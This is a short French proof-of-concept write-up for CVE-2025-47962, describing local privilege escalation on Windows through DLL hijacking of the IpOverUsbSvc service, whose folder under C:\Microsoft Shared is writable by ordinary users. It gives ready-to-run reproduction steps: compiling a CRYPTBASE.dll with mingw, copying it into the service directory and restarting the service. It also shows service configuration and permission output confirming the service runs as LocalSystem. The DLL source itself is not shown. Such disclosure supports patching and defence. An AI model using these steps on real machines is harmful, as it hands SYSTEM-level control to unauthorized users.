
Preuve de concept pour CVE-2025-47962 démontrant une élévation de privilèges locale via le détournement de DLL dans le service Windows IpOverUsbSvc en raison de permissions de répertoire non sécurisées.
Processus de reproduction : i686-w64-mingw32-gcc -shared -o CRYPTBASE.dll poc.c -lkernel32
copy CRYPTBASE.dll "C:\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\CRYPTBASE.dll"
net stop IpOverUsbSvc
net start IpOverUsbSvc

Explication : IpOverUsbSvc
sc.exe qc IpOverUsbSvc
SERVICE_NAME: IpOverUsbSvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
BINARY_PATH_NAME : "C:\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe"
SERVICE_START_NAME : LocalSystem
S'exécute avec les privilèges LocalSystem. L'exécutable se trouve dans le répertoire C:\Microsoft Shared, sur lequel les utilisateurs standard possèdent des droits de contrôle total.
Il a été découvert que les utilisateurs ordinaires peuvent écrire des fichiers dans le répertoire de service SYSTEM.
Puis surveiller la DLL

Les autorisations du répertoire C:\Microsoft Shared\ créé lors de l'installation du SDK Windows sont mal configurées :
C:\Microsoft Shared BUILTIN\Users:(I)(OI)(CI)(F)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(M)